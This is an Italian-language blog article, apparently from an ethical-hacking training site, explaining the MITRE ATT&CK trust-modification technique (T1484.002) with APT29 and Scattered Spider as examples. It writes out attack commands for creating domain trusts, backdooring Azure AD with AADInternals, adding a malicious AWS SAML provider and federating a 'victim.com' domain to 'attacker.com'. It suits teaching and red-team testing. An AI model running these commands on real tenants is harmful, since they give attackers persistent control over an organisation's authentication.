Manipolazione Trust: Trust Modification (T1484.002)

La manipolazione delle relazioni di trust rappresenta una delle tecniche più sofisticate per compromettere interi ambienti enterprise. Questa metodologia permette agli attaccanti di aggiungere nuovi trust tra domini, modificare le proprietà di quelli esistenti o alterare la configurazione delle relazioni fiduciarie tra domini e tenant cloud.

La tecnica si posiziona strategicamente nelle tattiche TA0004 (Privilege Escalation) e TA0005 (Defense Evasion), manifestandosi tipicamente nelle fasi di escalation e mantenimento dell'accesso nella kill chain. Gli attaccanti sfruttano questi meccanismi per elevare i privilegi senza necessità di compromettere direttamente account amministrativi, bypassando al contempo i controlli di sicurezza tradizionali.

L'impatto è devastante: con 2 gruppi APT attivi, questa tecnica ha già dimostrato la sua efficacia in campagne come SolarWinds Compromise, dove APT29 ha modificato le impostazioni di federazione per accettare token SAML firmati con certificati sotto il loro controllo.

Per testare la resilienza dei trust di dominio, inizia verificando le relazioni esistenti. In ambiente Windows, utilizza nltest /domain_trusts per enumerare tutti i trust attivi. Se hai accesso privilegiato, puoi interrogare direttamente Active Directory con PowerShell:

Get-ADTrust -Filter * | Select-Object Name, Direction, TrustType

La creazione di un nuovo trust richiede privilegi elevati. Con Domain Admin, puoi utilizzare:

netdom trust TrustedDomain.com /Domain:TrustingDomain.com /add /UserD:Administrator /PasswordD: /UserO:Administrator /PasswordO:**

Per scenari più avanzati, AADInternals offre capacità offensive specifiche per ambienti Azure AD. Dopo l'installazione del modulo, puoi convertire un dominio gestito in federato:

ConvertTo-AADIntBackdoor -DomainName "victim.com"

Questa operazione crea una backdoor persistente permettendo l'autenticazione di qualsiasi utente nel tenant. Il tool modifica anche le informazioni DesktopSSO, ampliando le possibilità di accesso.

In ambienti cloud, la manipolazione avviene tramite API. Per AWS, un attaccante con permessi sufficienti può creare un nuovo identity provider SAML:

aws iam create-saml-provider --saml-metadata-document file://malicious-metadata.xml --name MaliciousIdP

La catena d'attacco tipica prevede: compromissione iniziale, escalation a Global Admin o equivalente, modifica configurazione trust, e infine persistenza attraverso autenticazione federata. Scattered Spider ha dimostrato l'efficacia di questo approccio aggiungendo provider federati ai tenant SSO delle vittime.

Per Azure AD, il comando PowerShell critico è:

Set-MsolDomainAuthentication -DomainName "victim.com" -Authentication Federated -PassiveLogOnUri "https://attacker.com/adfs" -SigningCertificate $cert

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo